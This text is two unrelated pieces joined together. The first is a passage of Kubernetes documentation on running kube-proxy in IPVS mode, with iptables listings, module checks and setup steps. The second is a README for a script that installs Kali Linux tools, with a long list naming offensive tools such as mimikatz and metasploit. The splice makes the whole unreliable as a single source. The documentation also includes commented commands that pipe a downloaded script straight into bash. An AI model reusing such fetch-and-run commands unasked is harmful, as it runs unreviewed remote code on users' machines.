ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-CLUSTER-IP dst,dst
```
**2. Specify cluster CIDR in kube-proxy startup**
If kube-proxy starts with `--cluster-cidr=<cidr>`, IPVS proxier will masquerade off-cluster traffic accessing service Cluster IP, which behaves the same as what IPTABLES proxier. Suppose kube-proxy is provided with the cluster cidr `10.244.16.0/24`, then the IPTABLES installed by IPVS proxier should be like what is shown below.
```shell
# iptables -t nat -nL
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */
Chain POSTROUTING (policy ACCEPT)
target prot opt source destination
KUBE-POSTROUTING all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes postrouting rules */
Chain KUBE-MARK-MASQ (3 references)
target prot opt source destination
MARK all -- 0.0.0.0/0 0.0.0.0/0 MARK or 0x4000
Chain KUBE-POSTROUTING (1 references)
target prot opt source destination
MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service traffic requiring SNAT */ mark match 0x4000/0x4000
MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-LOOP-BACK dst,dst,src
Chain KUBE-SERVICES (2 references)
target prot opt source destination
KUBE-MARK-MASQ all -- !10.244.16.0/24 0.0.0.0/0 match-set KUBE-CLUSTER-IP dst,dst
ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-CLUSTER-IP dst,dst
```
**3. Load Balancer type service**
For loadBalancer type service, IPVS proxier will install IPTABLES with match of ipset `KUBE-LOAD-BALANCER`.
Specially when service's `LoadBalancerSourceRanges` is specified or specified `externalTrafficPolicy=local`,
IPVS proxier will create ipset sets `KUBE-LOAD-BALANCER-LOCAL`/`KUBE-LOAD-BALANCER-FW`/`KUBE-LOAD-BALANCER-SOURCE-CIDR`
and install IPTABLES accordingly, which should look like what is shown below.
```shell
# iptables -t nat -nL
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */
Chain POSTROUTING (policy ACCEPT)
target prot opt source destination
KUBE-POSTROUTING all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes postrouting rules */
Chain KUBE-FIREWALL (1 references)
target prot opt source destination
RETURN all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-LOAD-BALANCER-SOURCE-CIDR dst,dst,src
KUBE-MARK-DROP all -- 0.0.0.0/0 0.0.0.0/0
Chain KUBE-LOAD-BALANCER (1 references)
target prot opt source destination
KUBE-FIREWALL all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-LOAD-BALANCER-FW dst,dst
RETURN all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-LOAD-BALANCER-LOCAL dst,dst
KUBE-MARK-MASQ all -- 0.0.0.0/0 0.0.0.0/0
Chain KUBE-MARK-DROP (1 references)
target prot opt source destination
MARK all -- 0.0.0.0/0 0.0.0.0/0 MARK or 0x8000
Chain KUBE-MARK-MASQ (2 references)
target prot opt source destination
MARK all -- 0.0.0.0/0 0.0.0.0/0 MARK or 0x4000
Chain KUBE-POSTROUTING (1 references)
target prot opt source destination
MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service traffic requiring SNAT */ mark match 0x4000/0x4000
MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-LOOP-BACK dst,dst,src
Chain KUBE-SERVICES (2 references)
target prot opt source destination
KUBE-LOAD-BALANCER all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-LOAD-BALANCER dst,dst
ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-LOAD-BALANCER dst,dst
```
**4. NodePort type service**
For NodePort type service, IPVS proxier will install IPTABLES with match of ipset `KUBE-NODE-PORT-TCP/KUBE-NODE-PORT-UDP`.
When specified `externalTrafficPolicy=local`, IPVS proxier will create ipset sets `KUBE-NODE-PORT-LOCAL-TCP/KUBE-NODE-PORT-LOCAL-UDP`
and install IPTABLES accordingly, which should look like what is shown below.
Suppose service with TCP type nodePort.
```shell
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */
Chain POSTROUTING (policy ACCEPT)
target prot opt source destination
KUBE-POSTROUTING all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes postrouting rules */
Chain KUBE-MARK-MASQ (2 references)
target prot opt source destination
MARK all -- 0.0.0.0/0 0.0.0.0/0 MARK or 0x4000
Chain KUBE-NODE-PORT (1 references)
target prot opt source destination
RETURN all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-NODE-PORT-LOCAL-TCP dst
KUBE-MARK-MASQ all -- 0.0.0.0/0 0.0.0.0/0
Chain KUBE-POSTROUTING (1 references)
target prot opt source destination
MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service traffic requiring SNAT */ mark match 0x4000/0x4000
MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-LOOP-BACK dst,dst,src
Chain KUBE-SERVICES (2 references)
target prot opt source destination
KUBE-NODE-PORT all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-NODE-PORT-TCP dst
```
**5. Service with externalIPs specified**
For service with `externalIPs` specified, IPVS proxier will install IPTABLES with match of ipset `KUBE-EXTERNAL-IP`,
Suppose we have service with `externalIPs` specified, IPTABLES rules should look like what is shown below.
```shell
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */
Chain POSTROUTING (policy ACCEPT)
target prot opt source destination
KUBE-POSTROUTING all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes postrouting rules */
Chain KUBE-MARK-MASQ (2 references)
target prot opt source destination
MARK all -- 0.0.0.0/0 0.0.0.0/0 MARK or 0x4000
Chain KUBE-POSTROUTING (1 references)
target prot opt source destination
MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service traffic requiring SNAT */ mark match 0x4000/0x4000
MASQUERADE all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-LOOP-BACK dst,dst,src
Chain KUBE-SERVICES (2 references)
target prot opt source destination
KUBE-MARK-MASQ all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-EXTERNAL-IP dst,dst
ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-EXTERNAL-IP dst,dst PHYSDEV match ! --physdev-is-in ADDRTYPE match src-type !LOCAL
ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 match-set KUBE-EXTERNAL-IP dst,dst ADDRTYPE match dst-type LOCAL
```
## Run kube-proxy in IPVS mode
Currently, local-up scripts, GCE scripts and kubeadm support switching IPVS proxy mode via exporting environment variables or specifying flags.
### Prerequisite
Ensure IPVS required kernel modules (**Notes**: use `nf_conntrack` instead of `nf_conntrack_ipv4` for Linux kernel 4.19 and later)
```shell
ip_vs
ip_vs_rr
ip_vs_wrr
ip_vs_sh
nf_conntrack_ipv4
```
1. have been compiled into the node kernel. Use
`grep -e ipvs -e nf_conntrack_ipv4 /lib/modules/$(uname -r)/modules.builtin`
and get results like the followings if compiled into kernel.
```
kernel/net/ipv4/netfilter/nf_conntrack_ipv4.ko
kernel/net/netfilter/ipvs/ip_vs.ko
kernel/net/netfilter/ipvs/ip_vs_rr.ko
kernel/net/netfilter/ipvs/ip_vs_wrr.ko
kernel/net/netfilter/ipvs/ip_vs_lc.ko
kernel/net/netfilter/ipvs/ip_vs_wlc.ko
kernel/net/netfilter/ipvs/ip_vs_fo.ko
kernel/net/netfilter/ipvs/ip_vs_ovf.ko
kernel/net/netfilter/ipvs/ip_vs_lblc.ko
kernel/net/netfilter/ipvs/ip_vs_lblcr.ko
kernel/net/netfilter/ipvs/ip_vs_dh.ko
kernel/net/netfilter/ipvs/ip_vs_sh.ko
kernel/net/netfilter/ipvs/ip_vs_sed.ko
kernel/net/netfilter/ipvs/ip_vs_nq.ko
kernel/net/netfilter/ipvs/ip_vs_ftp.ko
```
OR
2. have been loaded.
```shell
# load module <module_name>
modprobe -- ip_vs
modprobe -- ip_vs_rr
modprobe -- ip_vs_wrr
modprobe -- ip_vs_sh
modprobe -- nf_conntrack_ipv4
# to check loaded modules, use
lsmod | grep -e ip_vs -e nf_conntrack_ipv4
# or
cut -f1 -d " " /proc/modules | grep -e ip_vs -e nf_conntrack_ipv4
```
Packages such as `ipset` should also be installed on the node before using IPVS mode.
Kube-proxy will fall back to IPTABLES mode if those requirements are not met.
### Local UP Cluster
Kube-proxy will run in IPTABLES mode by default in a [local-up cluster](https://github.com/kubernetes/community/blob/master/contributors/devel/running-locally.md).
To use IPVS mode, users should export the env `KUBE_PROXY_MODE=ipvs` to specify the IPVS mode before [starting the cluster](https://github.com/kubernetes/community/blob/master/contributors/devel/running-locally.md#starting-the-cluster):
```shell
# before running `hack/local-up-cluster.sh`
export KUBE_PROXY_MODE=ipvs
```
### GCE Cluster
Similar to local-up cluster, kube-proxy in [clusters running on GCE](https://kubernetes.io/docs/getting-started-guides/gce/) run in IPTABLES mode by default. Users need to export the env `KUBE_PROXY_MODE=ipvs` before [starting a cluster](https://kubernetes.io/docs/getting-started-guides/gce/#starting-a-cluster):
```shell
#before running one of the commands chosen to start a cluster:
# curl -sS https://get.k8s.io | bash
# wget -q -O - https://get.k8s.io | bash
# cluster/kube-up.sh
export KUBE_PROXY_MODE=ipvs
```
### Cluster Created by Kubeadm
If you are using kubeadm with a [configuration file](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm-init/#config-file), you have to add mode: ipvs in a KubeProxyConfiguration (separated by -- that is also passed to kubeadm init).
```yaml
...
apiVersion: kubeproxy.config.k8s.io/v1alpha1
kind: KubeProxyConfiguration
mode: ipvs
...
```
before running
`kubeadm init --config <path_to_configuration_file>`
to specify the ipvs mode before deploying the cluster.
**Notes**
If ipvs mode is successfully on, you should see IPVS proxy rules (use `ipvsadm`) like
```shell
# ipvsadm -ln
IP Virtual Server version 1.2.1 (size=4096)
Prot LocalAddress:Port Scheduler Flags
-> RemoteAddress:Port Forward Weight ActiveConn InActConn
TCP 10.0.0.1:443 rr persistent 10800
-> 192.168.0.1:6443 Masq 1 1 0
```
or similar logs occur in kube-proxy logs (for example, `/tmp/kube-proxy.log` for local-up cluster) when the local cluster is running:
```
Using ipvs Proxier.
```
While there is no IPVS proxy rules or the following logs occurs indicate that the kube-proxy fails to use IPVS mode:
```
Can't use ipvs proxier, trying iptables proxier
Using iptables Proxier.
```
See the following section for more details on debugging.
## Debug
### Check IPVS proxy rules
Users can use `ipvsadm` tool to check whether kube-proxy are maintaining IPVS rules correctly. For example, we have the following services in the cluster:
```
# kubectl get svc --all-namespaces
NAMESPACE NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
default kubernetes ClusterIP 10.0.0.1 <none> 443/TCP 1d
kube-system kube-dns ClusterIP 10.0.0.10 <none> 53/UDP,53/TCP 1d
```
We may get IPVS proxy rules like:
```shell
# ipvsadm -ln
IP Virtual Server version 1.2.1 (size=4096)
Prot LocalAddress:Port Scheduler Flags
-> RemoteAddress:Port Forward Weight ActiveConn InActConn
TCP 10.0.0.1:443 rr persistent 10800
-> 192.168.0.1:6443 Masq 1 1 0
TCP 10.0.0.10:53 rr
-> 172.17.0.2:53 Masq 1 0 0
UDP 10.0.0.10:53 rr
-> 172.17.0.2:53 Masq 1 0 0
```
### Why kube-proxy can't start IPVS mode
Use the following check list to help you solve the problems:
**1. Specify proxy-mode=ipvs**
Check whether the kube-proxy mode has been set to `ipvs`.
**2. Install required kernel modules and packages**
Check whether the IPVS required kernel modules have been compiled into the kernel and packages installed. (see Prerequisite)
|
# kalitools-python3
**Python 3 script for installing kali tools on your linux machine (via apt)**
Features:
- Works in 2022
- Python 3
- All tools from [official kali website](https://www.kali.org/tools/)
- No async for custom installation configuration
- Ubuntu 20.04 LTS Installed 265/587 (45.14%) tools
### Usage
- `sudo git clone https://github.com/gh0st-work/kalitools-python3.git`
- `cd kalitools-python3`
- `sudo python3 main.py`
- Installation process started
### Result
On Ubuntu 20.04 LTS
```
wordlists : FAILURE (not installed)
bind9 : SUCCESS (ok)
bing-ip2hosts : FAILURE (not installed)
cmseek : FAILURE (not installed)
crack : SUCCESS (ok)
crackmapexec : FAILURE (not installed)
dc3dd : SUCCESS (ok)
dradis : FAILURE (not installed)
expect : SUCCESS (ok)
exploitdb : FAILURE (not installed)
flashrom : SUCCESS (ok)
freerdp2 : FAILURE (not installed)
git : SUCCESS (ok)
gvm : FAILURE (not installed)
httrack : SUCCESS (ok)
impacket-scripts : FAILURE (not installed)
intrace : FAILURE (not installed)
isr-evilgrade : FAILURE (not installed)
ivre : FAILURE (not installed)
john : SUCCESS (ok)
jsql : FAILURE (not installed)
kali-defaults : FAILURE (not installed)
maltego : FAILURE (not installed)
mercurial : SUCCESS (ok)
metasploit-framework : FAILURE (not installed)
ohrwurm : FAILURE (not installed)
openssh : FAILURE (not installed)
plocate : FAILURE (not installed)
powershell-empire : FAILURE (not installed)
samba : SUCCESS (ok)
set : FAILURE (not installed)
sfuzz : FAILURE (not installed)
spiderfoot : FAILURE (not installed)
sqlmap : SUCCESS (ok)
sslyze : FAILURE (not installed)
tcpflow : SUCCESS (ok)
theharvester : FAILURE (not installed)
tlssled : FAILURE (not installed)
usbutils : SUCCESS (ok)
util-linux : SUCCESS (ok)
wapiti : SUCCESS (ok)
watobo : FAILURE (not installed)
wifi-honey : FAILURE (not installed)
xmount : SUCCESS (ok)
xplico : FAILURE (not installed)
yersinia : SUCCESS (ok)
zaproxy : FAILURE (not installed)
aflplusplus : FAILURE (not installed)
amass : FAILURE (not installed)
android-sdk : SUCCESS (ok)
apache2 : SUCCESS (ok)
asleap : FAILURE (not installed)
atftp : SUCCESS (ok)
beef-xss : FAILURE (not installed)
bulk-extractor : FAILURE (not installed)
cherrytree : FAILURE (not installed)
chkrootkit : SUCCESS (ok)
chromium : FAILURE (not installed)
commix : FAILURE (not installed)
creddump7 : FAILURE (not installed)
cryptsetup : SUCCESS (ok)
dfdatetime : FAILURE (not installed)
dirbuster : FAILURE (not installed)
dislocker : SUCCESS (ok)
dnstracer : SUCCESS (ok)
dos2unix : SUCCESS (ok)
exiv2 : SUCCESS (ok)
eyewitness : FAILURE (not installed)
feroxbuster : FAILURE (not installed)
ffuf : FAILURE (not installed)
firefox-developer-edition-kbx : FAILURE (not installed)
firewalk : FAILURE (not installed)
firmware-sof : FAILURE (not installed)
foremost : SUCCESS (ok)
forensic-artifacts : SUCCESS (ok)
forensics-colorize : SUCCESS (ok)
framework2 : FAILURE (not installed)
gnuradio : SUCCESS (ok)
gpart : SUCCESS (ok)
gqrx-sdr : SUCCESS (ok)
gr-osmosdr : SUCCESS (ok)
gss-ntlmssp : SUCCESS (ok)
hashdeep : SUCCESS (ok)
hivex : FAILURE (not installed)
htshells : FAILURE (not installed)
ifenslave : SUCCESS (ok)
ike-scan : SUCCESS (ok)
impacket : FAILURE (not installed)
initramfs-tools : SUCCESS (ok)
irpas : SUCCESS (ok)
jadx : FAILURE (not installed)
kali-meta : FAILURE (not installed)
kali-tweaks : FAILURE (not installed)
king-phisher : FAILURE (not installed)
laudanum : FAILURE (not installed)
llvm-defaults : FAILURE (not installed)
maskprocessor : SUCCESS (ok)
mdbtools : SUCCESS (ok)
mdk3 : SUCCESS (ok)
mdk4 : SUCCESS (ok)
ncat-w32 : FAILURE (not installed)
net-snmp : FAILURE (not installed)
netbase : SUCCESS (ok)
netdiscover : SUCCESS (ok)
netkit-ftp : FAILURE (not installed)
netsniff-ng : SUCCESS (ok)
ngrep : SUCCESS (ok)
nishang : FAILURE (not installed)
nmap : SUCCESS (ok)
ophcrack : SUCCESS (ok)
p7zip : SUCCESS (ok)
patator : SUCCESS (ok)
pdf-parser : FAILURE (not installed)
pev : SUCCESS (ok)
php-defaults : FAILURE (not installed)
powershell : FAILURE (not installed)
princeprocessor : SUCCESS (ok)
proxychains-ng : FAILURE (not installed)
python-faraday : FAILURE (not installed)
qemu : SUCCESS (ok)
recoverdm : SUCCESS (ok)
responder : FAILURE (not installed)
shellter : FAILURE (not installed)
spraykatz : FAILURE (not installed)
statsprocessor : SUCCESS (ok)
subversion : SUCCESS (ok)
tcpdump : SUCCESS (ok)
teamsploit : FAILURE (not installed)
testssl.sh : SUCCESS (ok)
thc-pptp-bruter : FAILURE (not installed)
thc-ssl-dos : FAILURE (not installed)
tightvnc : FAILURE (not installed)
tmux : SUCCESS (ok)
u-boot : FAILURE (not installed)
udptunnel : SUCCESS (ok)
uhd : FAILURE (not installed)
unrar-nonfree : FAILURE (not installed)
upx-ucl : SUCCESS (ok)
urlcrazy : FAILURE (not installed)
vim : SUCCESS (ok)
winexe : FAILURE (not installed)
wireshark : SUCCESS (ok)
wotmate : FAILURE (not installed)
yara : SUCCESS (ok)
zenmap-kbx : FAILURE (not installed)
zim : SUCCESS (ok)
zsh : SUCCESS (ok)
binwalk : SUCCESS (ok)
bluez : SUCCESS (ok)
cifs-utils : SUCCESS (ok)
dnscat2 : FAILURE (not installed)
ghidra : FAILURE (not installed)
iw : SUCCESS (ok)
protos-sip : FAILURE (not installed)
stegcracker : FAILURE (not installed)
stunnel4 : SUCCESS (ok)
veil : FAILURE (not installed)
0trace : FAILURE (not installed)
aesfix : SUCCESS (ok)
afflib : FAILURE (not installed)
aircrack-ng : SUCCESS (ok)
amap : FAILURE (not installed)
arpwatch : SUCCESS (ok)
curlftpfs : SUCCESS (ok)
cutycapt : SUCCESS (ok)
dnsmap : SUCCESS (ok)
edb-debugger : SUCCESS (ok)
fake-hwclock : SUCCESS (ok)
freeradius : SUCCESS (ok)
gdb : SUCCESS (ok)
gdisk : SUCCESS (ok)
grokevt : SUCCESS (ok)
guymager : SUCCESS (ok)
hackrf : SUCCESS (ok)
heartleech : FAILURE (not installed)
ipv6-toolkit : FAILURE (not installed)
legion : FAILURE (not installed)
libnfc : FAILURE (not installed)
mc : SUCCESS (ok)
minicom : SUCCESS (ok)
miredo : SUCCESS (ok)
myrescue : SUCCESS (ok)
nasm : SUCCESS (ok)
nasty : SUCCESS (ok)
netkit-tftp : FAILURE (not installed)
netw-ib-ox-ag : FAILURE (not installed)
nfs-utils : FAILURE (not installed)
nmapsi4 : SUCCESS (ok)
openocd : SUCCESS (ok)
pack : FAILURE (not installed)
radare2 : SUCCESS (ok)
radare2-cutter : SUCCESS (ok)
recoverjpeg : SUCCESS (ok)
reglookup : SUCCESS (ok)
rfdump : SUCCESS (ok)
rifiuti2 : SUCCESS (ok)
rsakeyfind : SUCCESS (ok)
rtlsdr-scanner : FAILURE (not installed)
sipvicious : FAILURE (not installed)
sleuthkit : SUCCESS (ok)
sniffjoke : FAILURE (not installed)
spectools : SUCCESS (ok)
sqlitebrowser : SUCCESS (ok)
sudo : SUCCESS (ok)
thc-ipv6 : SUCCESS (ok)
traceroute : SUCCESS (ok)
unhide : SUCCESS (ok)
unhide.rb : SUCCESS (ok)
vpnc : SUCCESS (ok)
websploit : SUCCESS (ok)
abootimg : SUCCESS (ok)
aeskeyfind : SUCCESS (ok)
airgeddon : FAILURE (not installed)
altdns : FAILURE (not installed)
apache-users : FAILURE (not installed)
apktool : SUCCESS (ok)
arjun : FAILURE (not installed)
armitage : FAILURE (not installed)
arp-scan : SUCCESS (ok)
arping : SUCCESS (ok)
assetfinder : FAILURE (not installed)
autopsy : SUCCESS (ok)
axel : SUCCESS (ok)
backdoor-factory : SUCCESS (ok)
bed : FAILURE (not installed)
berate-ap : FAILURE (not installed)
bettercap : FAILURE (not installed)
bloodhound : FAILURE (not installed)
bluelog : FAILURE (not installed)
blueranger : FAILURE (not installed)
bluesnarfer : FAILURE (not installed)
braa : SUCCESS (ok)
bruteforce-salted-openssl : SUCCESS (ok)
brutespray : SUCCESS (ok)
btscanner : SUCCESS (ok)
bully : FAILURE (not installed)
burpsuite : FAILURE (not installed)
bytecode-viewer : FAILURE (not installed)
cabextract : SUCCESS (ok)
cadaver : SUCCESS (ok)
caldera : FAILURE (not installed)
capstone : FAILURE (not installed)
ccrypt : SUCCESS (ok)
certgraph : FAILURE (not installed)
cewl : SUCCESS (ok)
changeme : SUCCESS (ok)
chaosreader : SUCCESS (ok)
chirp : FAILURE (not installed)
chisel : FAILURE (not installed)
chntpw : SUCCESS (ok)
cisco-auditing-tool : FAILURE (not installed)
cisco-global-exploiter : FAILURE (not installed)
cisco-ocs : FAILURE (not installed)
cisco-torch : FAILURE (not installed)
cloud-enum : FAILURE (not installed)
cloudbrute : FAILURE (not installed)
cmospwd : SUCCESS (ok)
code-oss : FAILURE (not installed)
command-not-found : SUCCESS (ok)
copy-router-config : FAILURE (not installed)
covenant-kbx : FAILURE (not installed)
cowpatty : SUCCESS (ok)
crackle : FAILURE (not installed)
crowbar : FAILURE (not installed)
crunch : SUCCESS (ok)
cryptcat : SUCCESS (ok)
cryptsetup-nuke-password : FAILURE (not installed)
cutecom : SUCCESS (ok)
cymothoa : FAILURE (not installed)
darkstat : SUCCESS (ok)
davtest : FAILURE (not installed)
dbd : FAILURE (not installed)
dbeaver : FAILURE (not installed)
dcfldd : SUCCESS (ok)
ddrescue : FAILURE (not installed)
de4dot : FAILURE (not installed)
dex2jar : FAILURE (not installed)
dfvfs : FAILURE (not installed)
dfwinreg : FAILURE (not installed)
dhcpig : SUCCESS (ok)
dirb : SUCCESS (ok)
dirsearch : FAILURE (not installed)
distorm3 : FAILURE (not installed)
dmitry : SUCCESS (ok)
dns2tcp : SUCCESS (ok)
dnschef : FAILURE (not installed)
dnsenum : SUCCESS (ok)
dnsgen : FAILURE (not installed)
dnsrecon : SUCCESS (ok)
dnstwist : FAILURE (not installed)
dnswalk : SUCCESS (ok)
doona : SUCCESS (ok)
dotdotpwn : FAILURE (not installed)
driftnet : SUCCESS (ok)
dsniff : SUCCESS (ok)
dumpsterdiver : FAILURE (not installed)
dumpzilla : FAILURE (not installed)
eaphammer : FAILURE (not installed)
eapmd5pass : FAILURE (not installed)
emailharvester : FAILURE (not installed)
enum4linux : FAILURE (not installed)
enumiax : FAILURE (not installed)
ethtool : SUCCESS (ok)
evil-ssdp : FAILURE (not installed)
exe2hexbat : FAILURE (not installed)
exifprobe : SUCCESS (ok)
exploitdb-bin-sploits : FAILURE (not installed)
exploitdb-papers : FAILURE (not installed)
ext3grep : SUCCESS (ok)
ext4magic : SUCCESS (ok)
extundelete : SUCCESS (ok)
fcrackzip : SUCCESS (ok)
fern-wifi-cracker : FAILURE (not installed)
fierce : FAILURE (not installed)
fiked : FAILURE (not installed)
finalrecon : FAILURE (not installed)
firmware-mod-kit : FAILURE (not installed)
fping : SUCCESS (ok)
fragrouter : FAILURE (not installed)
freeradius-wpe : FAILURE (not installed)
ftester : FAILURE (not installed)
galleta : SUCCESS (ok)
getallurls : FAILURE (not installed)
gitleaks : FAILURE (not installed)
gobuster : SUCCESS (ok)
godoh : FAILURE (not installed)
golang-github-binject-go-donut: FAILURE (not installed)
goldeneye : SUCCESS (ok)
goofile : FAILURE (not installed)
gospider : FAILURE (not installed)
gparted : SUCCESS (ok)
gpp-decrypt : FAILURE (not installed)
gr-air-modes : SUCCESS (ok)
gr-iqbal : SUCCESS (ok)
hamster-sidejack : FAILURE (not installed)
hash-identifier : FAILURE (not installed)
hashcat : SUCCESS (ok)
hashcat-utils : FAILURE (not installed)
hashid : SUCCESS (ok)
hashrat : SUCCESS (ok)
hb-honeypot : FAILURE (not installed)
hcxtools : FAILURE (not installed)
hexinject : FAILURE (not installed)
hostapd-mana : FAILURE (not installed)
hostapd-wpe : FAILURE (not installed)
hosthunter : FAILURE (not installed)
hotpatch : FAILURE (not installed)
hping3 : SUCCESS (ok)
httprint : FAILURE (not installed)
httprobe : FAILURE (not installed)
hurl : FAILURE (not installed)
hydra : SUCCESS (ok)
hyperion : FAILURE (not installed)
i2c-tools : SUCCESS (ok)
iaxflood : FAILURE (not installed)
ibombshell : FAILURE (not installed)
ident-user-enum : FAILURE (not installed)
inetsim : SUCCESS (ok)
inspectrum : SUCCESS (ok)
inspy : FAILURE (not installed)
instaloader : FAILURE (not installed)
inviteflood : FAILURE (not installed)
iodine : SUCCESS (ok)
ismtp : FAILURE (not installed)
javasnoop : FAILURE (not installed)
jboss-autopwn : FAILURE (not installed)
jd-gui : FAILURE (not installed)
johnny : FAILURE (not installed)
joomscan : FAILURE (not installed)
joplin : FAILURE (not installed)
kali-community-wallpapers : FAILURE (not installed)
kali-wallpapers : FAILURE (not installed)
kalibrate-rtl : FAILURE (not installed)
kismet : SUCCESS (ok)
knocker : SUCCESS (ok)
koadic : FAILURE (not installed)
lbd : FAILURE (not installed)
libewf : FAILURE (not installed)
libfindrtp : FAILURE (not installed)
libfreefare : FAILURE (not installed)
libpst : FAILURE (not installed)
linux-exploit-suggester : FAILURE (not installed)
lvm2 : SUCCESS (ok)
lynis : SUCCESS (ok)
mac-robber : SUCCESS (ok)
macchanger : SUCCESS (ok)
magicrescue : SUCCESS (ok)
masscan : SUCCESS (ok)
massdns : FAILURE (not installed)
medusa : SUCCESS (ok)
memdump : SUCCESS (ok)
metacam : SUCCESS (ok)
metagoofil : FAILURE (not installed)
mfcuk : SUCCESS (ok)
mfoc : SUCCESS (ok)
mfterm : FAILURE (not installed)
mimikatz : FAILURE (not installed)
missidentify : SUCCESS (ok)
mitmproxy : SUCCESS (ok)
msfpc : FAILURE (not installed)
multimac : FAILURE (not installed)
multimon-ng : SUCCESS (ok)
mysql-defaults : FAILURE (not installed)
nbtscan : SUCCESS (ok)
nbtscan-unixwiz : FAILURE (not installed)
ncrack : SUCCESS (ok)
ncurses-hexedit : SUCCESS (ok)
netcat : SUCCESS (ok)
netkit-telnet : FAILURE (not installed)
netmask : SUCCESS (ok)
netsed : SUCCESS (ok)
nextnet : FAILURE (not installed)
nikto : SUCCESS (ok)
nipper-ng : FAILURE (not installed)
o-saft : SUCCESS (ok)
oclgausscrack : FAILURE (not installed)
odat : FAILURE (not installed)
offsec-courses : FAILURE (not installed)
ollydbg : FAILURE (not installed)
onesixtyone : SUCCESS (ok)
openvpn : SUCCESS (ok)
oscanner : FAILURE (not installed)
osrframework : FAILURE (not installed)
outguess : SUCCESS (ok)
owasp-mantra-ff : FAILURE (not installed)
owl : FAILURE (not installed)
p0f : SUCCESS (ok)
pacu : FAILURE (not installed)
padbuster : FAILURE (not installed)
paros : FAILURE (not installed)
parsero : SUCCESS (ok)
parted : SUCCESS (ok)
pasco : SUCCESS (ok)
passing-the-hash : FAILURE (not installed)
payloadsallthethings : FAILURE (not installed)
pdfcrack : SUCCESS (ok)
pdfid : FAILURE (not installed)
peirates : FAILURE (not installed)
perl-cisco-copyconfig : FAILURE (not installed)
phishery : FAILURE (not installed)
photon : FAILURE (not installed)
phpggc : FAILURE (not installed)
pipal : FAILURE (not installed)
pixiewps : SUCCESS (ok)
plaso : FAILURE (not installed)
plecost : FAILURE (not installed)
pnscan : SUCCESS (ok)
polenum : SUCCESS (ok)
pompem : SUCCESS (ok)
powercat : FAILURE (not installed)
powersploit : FAILURE (not installed)
proxytunnel : SUCCESS (ok)
pskracker : FAILURE (not installed)
ptunnel : SUCCESS (ok)
pwnat : FAILURE (not installed)
pwncat : FAILURE (not installed)
python-defaults : FAILURE (not installed)
qsslcaudit : FAILURE (not installed)
quark-engine : FAILURE (not installed)
rainbowcrack : FAILURE (not installed)
rake : SUCCESS (ok)
rarcrack : SUCCESS (ok)
rcracki-mt : FAILURE (not installed)
rdesktop : SUCCESS (ok)
reaver : SUCCESS (ok)
rebind : FAILURE (not installed)
recon-ng : SUCCESS (ok)
recordmydesktop : SUCCESS (ok)
redfang : FAILURE (not installed)
redsnarf : FAILURE (not installed)
redsocks : SUCCESS (ok)
regripper : FAILURE (not installed)
rephrase : SUCCESS (ok)
requests : FAILURE (not installed)
rfcat : FAILURE (not installed)
ridenum : FAILURE (not installed)
rifiuti : SUCCESS (ok)
rkhunter : SUCCESS (ok)
robotstxt : FAILURE (not installed)
ropper : FAILURE (not installed)
routerkeygenpc : FAILURE (not installed)
routersploit : FAILURE (not installed)
rsmangler : FAILURE (not installed)
rtpbreak : FAILURE (not installed)
rtpflood : FAILURE (not installed)
rtpinsertsound : FAILURE (not installed)
rtpmixsound : FAILURE (not installed)
safecopy : SUCCESS (ok)
sakis3g : FAILURE (not installed)
samdump2 : SUCCESS (ok)
sbd : SUCCESS (ok)
scalpel : SUCCESS (ok)
scapy : FAILURE (not installed)
screen : SUCCESS (ok)
scrounge-ntfs : SUCCESS (ok)
sctpscan : FAILURE (not installed)
seclists : FAILURE (not installed)
secure-socket-funneling : FAILURE (not installed)
sendemail : SUCCESS (ok)
shed : SUCCESS (ok)
shellnoob : FAILURE (not installed)
sherlock : FAILURE (not installed)
sidguesser : FAILURE (not installed)
siege : SUCCESS (ok)
silenttrinity : FAILURE (not installed)
siparmyknife : FAILURE (not installed)
sipcrack : SUCCESS (ok)
